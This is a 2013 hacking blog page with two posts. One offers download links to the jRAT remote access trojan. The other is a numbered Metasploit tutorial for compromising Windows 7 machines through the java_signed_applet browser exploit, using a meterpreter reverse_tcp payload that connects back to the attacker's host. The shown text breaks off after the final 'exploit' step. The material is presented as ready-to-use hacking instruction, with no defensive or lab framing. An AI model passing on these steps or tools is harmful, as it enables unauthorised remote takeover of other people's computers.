Skip to main content

Posts

Showing posts from January, 2013

Hacking With Jrat

Below are The Links To Doc File and Jrat Files  Enjoy  !!! By c4sp3r

Hacking Windows 7 Using Backtrack (Java_signed_applet Method)

Hacking Window 7 Through Backtrack Yes You Have Come to a Right Place To Learn Great Things Today I am Going to Share How to Hack Window 7 Using Java_Signed_Applet code execution Through Backtrack. Requirements :- 1. Backtrack 5r3 2. Vmware (To Run Backtrack if u dont want to install the os) Steps:- 1. Open New Terminal in Backtrack 2. Type msfconsole and hit Enter then wait for sometime till it loads 3. Type use exploit/multi/browser/java_signed_applet and hit enter. 4. Type set payload windows/meterpreter/reverse_tcp and hit enter. 5. Then Type Show Options to see what is to be changed. 6. Now set lhost to your backtrack ip (e.g set lhost 192.168.1.1)  u can check your ip by opening new terminal and typing ifconfig. 7. Now set lport to 443 8. Now set srvport to 80 9. Now set uripath /  10. Now just type exploit and press Enter :) You are done you will be given a link like this...